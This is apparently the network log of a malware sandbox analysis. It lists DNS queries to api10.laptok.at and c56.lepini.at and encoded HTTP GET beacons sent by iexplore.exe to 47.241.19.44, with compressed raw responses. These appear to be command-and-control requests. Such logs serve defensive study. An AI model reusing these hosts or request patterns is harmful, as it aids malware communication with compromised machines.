                                                                                                                                      Nov 24, 2020 21:20:48.484992027 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485034943 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485076904 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485116959 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485129118 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485174894 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485225916 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485232115 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485282898 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485328913 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485347033 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485411882 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485443115 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485483885 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485543013 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485584021 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485594988 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485644102 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485671997 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.485697985 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.485723972 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747396946 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747454882 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747494936 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747534990 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747575998 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747591019 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747610092 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747638941 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747683048 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747720957 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747742891 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747782946 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747788906 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747840881 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747885942 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747936010 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.747940063 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.747997046 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748042107 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748050928 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.748091936 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.748097897 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748150110 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748198032 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748241901 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748251915 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.748297930 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748347998 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.748368025 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.748661995 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850639105 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850658894 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850675106 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850687027 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850698948 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850722075 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850735903 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850750923 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850759029 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850775003 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850791931 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850804090 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850815058 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850828886 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850836039 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850853920 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850867033 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850873947 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850891113 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850899935 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850913048 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850929022 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850939035 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.850949049 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850965977 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850981951 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.850990057 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.851015091 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.898394108 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.010006905 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.054749012 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060220003 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060272932 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060312033 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060353041 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060395002 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060436010 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060451984 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060494900 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060549974 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060556889 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060610056 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060647011 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060686111 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060714006 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060739994 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060786009 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060817957 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060827971 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060877085 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060883045 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.060939074 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.060981035 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.061008930 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.061033964 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.061077118 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.061120987 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.061142921 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.061595917 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.081959963 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.112587929 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.164094925 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.316627026 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.316684961 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.316724062 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.316762924 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.316800117 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.316847086 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.316884041 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.316905975 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.316906929 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.316966057 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.316971064 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.317020893 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.317060947 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.317097902 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.317118883 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.317153931 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.317194939 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.317209959 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.317255020 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.317296982 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.317323923 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:49.317353964 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.317603111 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.361721992 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:49.623353004 CET804975847.241.19.44192.168.2.3

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 24, 2020 21:18:57.247888088 CET6349253192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:18:57.283297062 CET53634928.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:18:58.370898962 CET6083153192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:18:58.406500101 CET53608318.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:18:59.613343954 CET6010053192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:18:59.649346113 CET53601008.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:00.950651884 CET5319553192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:00.977987051 CET53531958.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:02.430480003 CET5014153192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:02.457798958 CET53501418.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:03.536190987 CET5302353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:03.563496113 CET53530238.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:04.573903084 CET4956353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:04.600985050 CET53495638.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:05.307780981 CET5135253192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:05.343734026 CET53513528.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:06.375205040 CET5934953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:06.411031008 CET53593498.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:07.416126013 CET5708453192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:07.443293095 CET53570848.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:08.476389885 CET5882353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:08.503844976 CET53588238.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:10.887249947 CET5756853192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:10.914577007 CET53575688.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:11.981955051 CET5054053192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:12.018049955 CET53505408.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:14.438371897 CET5436653192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:14.465728045 CET53543668.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:15.324086905 CET5303453192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:15.370722055 CET53530348.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:17.721226931 CET5776253192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:17.724993944 CET5543553192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:17.759165049 CET53577628.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:17.760394096 CET53554358.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:23.278008938 CET5071353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:23.305476904 CET53507138.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:29.867939949 CET5613253192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:29.907479048 CET53561328.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:36.579261065 CET5898753192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:36.623406887 CET53589878.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:45.307039976 CET5657953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:45.345153093 CET53565798.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:46.300085068 CET5657953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:46.327358961 CET53565798.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:46.823534012 CET6063353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:46.862984896 CET53606338.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:47.317177057 CET5657953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:47.344445944 CET53565798.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:49.214868069 CET6129253192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:49.242223024 CET53612928.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:50.083645105 CET5657953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:50.111068964 CET53565798.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:53.453824997 CET6361953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:53.490825891 CET53636198.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:19:54.098855019 CET5657953192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:19:54.134315968 CET53565798.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:00.613964081 CET6493853192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:00.653554916 CET53649388.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:01.575886011 CET6194653192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:01.611551046 CET53619468.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:06.169200897 CET6491053192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:06.205080986 CET53649108.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:27.066874981 CET5212353192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:27.093872070 CET53521238.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:27.429882050 CET5613053192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:27.470750093 CET53561308.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:47.239192009 CET5633853192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:47.274983883 CET53563388.8.8.8192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:47.974076986 CET5942053192.168.2.38.8.8.8
                                                                                                                                      Nov 24, 2020 21:20:48.001683950 CET53594208.8.8.8192.168.2.3

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                      Nov 24, 2020 21:19:17.724993944 CET192.168.2.38.8.8.80xeb32Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:01.575886011 CET192.168.2.38.8.8.80x3607Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:06.169200897 CET192.168.2.38.8.8.80xce1fStandard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:47.239192009 CET192.168.2.38.8.8.80x2611Standard query (0)c56.lepini.atA (IP address)IN (0x0001)

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                      Nov 24, 2020 21:19:17.760394096 CET8.8.8.8192.168.2.30xeb32No error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:01.611551046 CET8.8.8.8192.168.2.30x3607No error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:06.205080986 CET8.8.8.8192.168.2.30xce1fNo error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                      Nov 24, 2020 21:20:47.274983883 CET8.8.8.8192.168.2.30x2611No error (0)c56.lepini.at47.241.19.44A (IP address)IN (0x0001)

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • api10.laptok.at
                                                                                                                                      • c56.lepini.at

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      0192.168.2.34973247.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:19:18.053018093 CET184OUTGET /api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wfxlV_2BR_/2BKRWfbGdbKpccDlq/wjU_2FWdPQ1P/mnarl1yMJqa/qdhNVoh3oOz5bs/z60RqTSIuCKm6aR4446gj/CWuUplffN3IjYKGv/jAh08Sky_2BsVaS/mR26uhXrf_2FPOtRsi/kAWpATwOt/nHT1d49Zze7GI739MC4q/fqUVMDgzP8AWQSOV_2B/UYhCEI1zFK8E9H5v_0A_0D/bl8Ojy2x17tuP/HyuqS2KW/QxDOc9ASBROfBvf26kniC8O/wYs HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:19:19.034208059 CET197INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:19:18 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      1192.168.2.34975147.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:01.881902933 CET4054OUTGET /api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4DrZmcsV/dPovDeCz_2Bns7/SzRlXKXDTcnNvTwVof3JC/9OHXqekyZyAtiU_2/FKiPw6K2S4WkVU2/jPZ3OPDfyBZIrPRMr3/FBdYtTIJr/eK7MjotByUG0UytbsrJ_/2BIobg6gkWRSCkFALiR/3H39hT7Vg1tNx00aR3HUuS/eyDURwI5Q5dTx/nK0Boek7/Pnsv74L6CwFu08_0A_0D5Cn/saoDbWMFDu/ABzmmLf_2BuodD1FH/_2Ftl0V1Zs5G/QPAAHiHJ/7 HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: api10.laptok.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 24, 2020 21:20:02.933356047 CET4055INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:02 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a 45 b6 ab 40 14 45 07 44 03 b7 26 ee 16 9c 1e ee ee 8c fe bf df 4e 56 a0 e0 d6 39 7b 07 d6 4d d3 03 32 8f 68 51 ec dd a4 d5 03 89 87 98 b3 1b 6f df 85 86 fd db eb df a1 f7 6a 94 f1 93 f1 24 42 e6 e4 ba 60 24 36 cd 08 66 90 b5 f8 01 db 84 68 d0 be 9b e6 09 88 b2 86 93 f4 32 4b 37 33 5f ca 10 25 01 be f3 e9 47 28 85 60 d1 37 d8 75 32 c1 f0 c3 41 9d ea d2 61 a7 10 06 b3 77 01 c0 b6 b8 02 88 ed 08 82 11 8c fb 07 e9 3b d2 c2 84 c7 c3 e3 1f 76 bf a6 fd 90 0a b6 6d e8 c8 64 9e c8 77 d9 70 c6 a6 a5 76 32 a2 43 9d ab bf cb 20 8f 02 8c 16 86 1a 4e 0d 82 da 54 1b 01 b0 1d 40 16 35 31 40 8d 6d 9a 21 ed 7c 0f 93 79 4d 1a cb 88 00 9a 60 86 10 4f a6 36 81 13 1d f0 f1 2d 16 9d c2 ad cb b3 26 3b 9c 31 fe f4 af 33 e2 14 50 07 27 0c f2 b9 d3 d8 50 9d 6f 34 b6 d0 b1 c1 f6 03 25 8e d2 18 cf 95 e4 78 13 e2 5c c0 ff 06 8b bb 6f 49 67 ec de cc 55 dc 9d c1 f3 77 99 48 46 82 3a 23 bb 09 69 7e 94 fc 0e e4 aa 9b 3b 2b ce 2c ca 3c 2f 1f 4a ad 89 e2 a2 7b 31 7e 33 b4 9a 74 b6 a1 0c d5 80 bf 22 62 dc 7b fd 96 75 2f 73 e3 90 24 0d 64 37 42 e6 fe b8 a6 4a 3b 7a e4 22 01 b3 ab 5b 79 65 a2 64 47 de a3 09 b8 4e a1 02 fe 9b 49 fc 37 de d4 8a 19 f8 1d 20 63 24 6c 39 35 fd 80 b6 24 e6 d0 40 58 fc 07 27 f1 d4 68 0e 9b 4f 5d b1 10 f8 8c 33 0d a9 8d 41 1c da ca af 5a 8c 38 0c d4 3c ad fa d1 a5 72 23 3d 16 cb b8 17 7c 3f 5d 8c fb d9 73 62 8a fe 24 10 c3 f6 e8 04 6c e2 05 ab 77 c4 ef 14 9e 05 0f 80 74 5f 27 81 64 70 67 64 c0 09 a6 74 e9 ea 88 b5 7b 34 bb 16 08 bc 2d e8 ed e9 b5 3a 4b f1 0a c7 e2 18 1c 62 be 51 6c 62 d2 ab 78 c5 9f 00 23 a8 33 60 cb 89 de be c5 8f 4a fe 42 fd 91 40 73 b8 08 d4 da af bd 5f 47 b2 da dc 9d 6a c7 18 db e8 33 29 de ef 02 77 c3 37 99 31 8b 27 3e a1 99 e7 cc 85 ef c5 69 9e 04 80 de af 4b cd f2 18 af 66 6d 51 b5 d2 96 39 84 c9 94 3c 69 10 ac 4b cd 4d bb 73 eb 95 9b 30 a1 39 11 9c f4 df 30 42 95 98 81 19 ed fe a0 2c 07 31 c5 e7 43 3b e0 27 4b e0 3a e2 2d a2 e5 64 74 72 23 32 58 d9 d2 89 29 a6 43 3e 01 78 f1 5b 64 5b 24 3f a4 dd f6 47 68 f9 0d e5 07 be 56 de cb 9d 20 8c ba 1f 66 01 2c ac d2 19 87 45 d3 66 b9 a0 3d d1 c5 ac 10 a6 63 90 6a 71 2e b6 5b 39 c7 3a c3 3e 22 2a 73 df 42 ef 89 10 93 15 a3 0b e6 3a 4c f4 c9 40 a3 df 04 cd 79 86 8c 6a ca ef 78 0e 1a 61 67 30 02 e6 fe b0 f1 de 9a 37 9d 0c 6e e3 f8 56 7a c3 b3 31 46 d5 1f 7d ca bc 38 0d bd 21 b2 d3 8b 00 a1 37 bd 5b c1 25 ce 84 8e 18 ce fb 0e 8b 8f 9e 64 